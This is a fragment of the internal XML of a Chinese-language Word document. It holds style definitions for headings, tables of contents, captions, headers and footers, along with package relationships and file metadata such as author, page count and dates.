    <w:rsid w:val="00F674E4"/>
    <w:rsid w:val="00F7039F"/>
    <w:rsid w:val="00F70C0B"/>
    <w:rsid w:val="00F70F33"/>
    <w:rsid w:val="00F80D7F"/>
    <w:rsid w:val="00F81D26"/>
    <w:rsid w:val="00F84F30"/>
    <w:rsid w:val="00F877AF"/>
    <w:rsid w:val="00F90551"/>
    <w:rsid w:val="00F9140C"/>
    <w:rsid w:val="00F91472"/>
    <w:rsid w:val="00F94C06"/>
    <w:rsid w:val="00F97B69"/>
    <w:rsid w:val="00FA1F95"/>
    <w:rsid w:val="00FA50BD"/>
    <w:rsid w:val="00FA6005"/>
    <w:rsid w:val="00FA6355"/>
    <w:rsid w:val="00FA7E6D"/>
    <w:rsid w:val="00FB1D92"/>
    <w:rsid w:val="00FB5BAB"/>
    <w:rsid w:val="00FB6F9C"/>
    <w:rsid w:val="00FC6C0E"/>
    <w:rsid w:val="00FD46A2"/>
    <w:rsid w:val="00FD54F3"/>
    <w:rsid w:val="00FE3CD0"/>
    <w:rsid w:val="00FE4307"/>
    <w:rsid w:val="00FF0297"/>
    <w:rsid w:val="00FF0A2D"/>
    <w:rsid w:val="00FF171C"/>
    <w:rsid w:val="00FF4338"/>
    <w:rsid w:val="00FF457D"/>
    <w:rsid w:val="00FF57EE"/>
    <w:rsid w:val="01E23011"/>
    <w:rsid w:val="05703372"/>
    <w:rsid w:val="0B2823DD"/>
    <w:rsid w:val="0F0B73D9"/>
    <w:rsid w:val="157805B2"/>
    <w:rsid w:val="2ABB0720"/>
    <w:rsid w:val="2C5F6158"/>
    <w:rsid w:val="3E85480E"/>
    <w:rsid w:val="43201824"/>
    <w:rsid w:val="45EA7CB3"/>
    <w:rsid w:val="4A0B3EF9"/>
    <w:rsid w:val="4DFC42C5"/>
    <w:rsid w:val="5CE45005"/>
    <w:rsid w:val="671A78C2"/>
    <w:rsid w:val="6E3A6B60"/>
    <w:rsid w:val="6F77638B"/>
    <w:rsid w:val="6FCE58C4"/>
    <w:rsid w:val="7BF309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28"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:beforeLines="130" w:afterLines="130" w:line="288" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="29"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="300" w:after="300" w:line="288" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="30"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>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5">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="440" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="440"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="Date"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="26"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="400" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="25"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="22"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="2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autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:tabs>
        <w:tab w:val="left" w:pos="840"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="400" w:lineRule="exact"/>
      <w:ind w:left="221"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">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5">
    <w:name w:val="Title"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:link w:val="33"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="340" w:beforeLines="0" w:after="330" w:afterLines="0" w:line="578" w:lineRule="auto"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:cs="Times New Roman"/>
      <w:szCs w:val="32"/>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Hyperlink"/>
    <w:basedOn w:val="18"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="日期 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="27">
    <w:name w:val="标题-无编号"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="31">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="48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32">
    <w:name w:val="图"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="200" w:after="40" w:line="320" w:lineRule="atLeast"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="33">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="18"/>
    <w:link w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>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header" Target="header2.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="head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982F7EF-D196-4EBB-A998-182627D402E8}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal</Template>
  <Company>微软中国</Company>
  <Pages>18</Pages>
  <Words>4852</Words>
  <Characters>5919</Characters>
  <Lines>5</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>10</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6046</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2021-08-23T03:43:00Z</dcterms:created>
  <dc:creator>郝帅</dc:creator>
  <cp:lastModifiedBy>欧蜜（2和11）</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-28T08:34:58Z</dcterms:modified>
  <cp:revision>156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FB3F09ECD2604C04A1FC4C7A863D5B62_13</vt:lpwstr>
  </property>
</Properties>
</file>